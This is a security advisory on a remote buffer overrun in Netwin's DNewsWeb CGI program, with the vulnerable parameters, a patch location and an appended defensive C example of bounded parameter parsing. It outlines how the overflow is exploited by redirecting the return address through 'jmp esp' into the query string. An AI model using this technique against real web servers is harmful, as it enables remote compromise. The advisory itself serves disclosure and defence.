COMMAND
DNewsweb
SYSTEMS AFFECTED
*nix/Win32 Web Servers running Dnewsweb
PROBLEM
The following is based on a Cerberus Information Security Advisory by
Mark Litchfield. The Cerberus Security Team has found a remotely
exploitable buffer overrun in Netwin's DNewsWeb (dnewsweb /
dnewsweb.exe v5.3e1), a CGI program designed to give access to NNTP
services over the World Wide Web. By supplying a specially
formed QUERY_STRING to the program, a buffer is overflowed,
allowing execution of arbitrary code and compromising the web server.
There are several unchecked buffers in this program, and several
of the QUERY_STRING parameters can be overflowed, such as "group"
and "utag". This overflow is simple to exploit by overwriting the
saved return address with an address that contains a "jmp esp" or
"call esp" - the remainder of the QUERY_STRING is pointed to
by ESP.
This vulnerability was noticed some time ago by plaguez and the
attached code was written as "proof-of-concept":
SOLUTION
Netwin has made a patch for this available from their
ftp server:
ftp://ftp.netwinsite.com/pub/dnewsweb/beta/
Obtain the 5.4c3 version required for your system.
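
The bug class described under PROBLEM is a CGI program copying QUERY_STRING
parameters such as "group" and "utag" into fixed-size buffers without a
length check. The following is an added example, not Netwin's code or part
of the original advisory, of extracting such a parameter with an explicit
bound; get_param and PARAM_MAX are hypothetical names, and the 64-byte limit
is an assumption, since the advisory does not give the real buffer sizes.

```c
#include <stdio.h>
#include <string.h>

#define PARAM_MAX 64   /* assumed limit; real buffer sizes are not on the page */

/* Copy the raw value of parameter `name` from query string `qs` into
 * out[outsz]. Returns 0 on success, -1 if the parameter is absent, and
 * -2 if the value does not fit, in which case the request should be
 * rejected rather than truncated and processed. */
int get_param(const char *qs, const char *name, char *out, size_t outsz)
{
    size_t nlen = strlen(name);
    const char *p = qs;

    if (outsz == 0)
        return -2;
    out[0] = '\0';
    while (p && *p) {
        const char *end = strchr(p, '&');
        size_t seglen = end ? (size_t)(end - p) : strlen(p);

        /* Match "name=" exactly at the start of this segment. */
        if (seglen > nlen && strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            size_t vlen = seglen - nlen - 1;
            if (vlen >= outsz)          /* no room for value plus NUL */
                return -2;
            memcpy(out, p + nlen + 1, vlen);
            out[vlen] = '\0';
            return 0;
        }
        p = end ? end + 1 : NULL;
    }
    return -1;
}

int main(void)
{
    /* Constructed sample inputs, not captured traffic. */
    char group[PARAM_MAX], big[6 + 256 + 1];
    int r = get_param("group=comp.security.misc&utag=", "group",
                      group, sizeof group);
    printf("normal request:   %d \"%s\"\n", r, group);

    strcpy(big, "group=");
    memset(big + 6, 'A', 256);          /* 256-byte value, over the limit */
    big[6 + 256] = '\0';
    printf("overlong request: %d\n",
           get_param(big, "group", group, sizeof group));
    return 0;
}
```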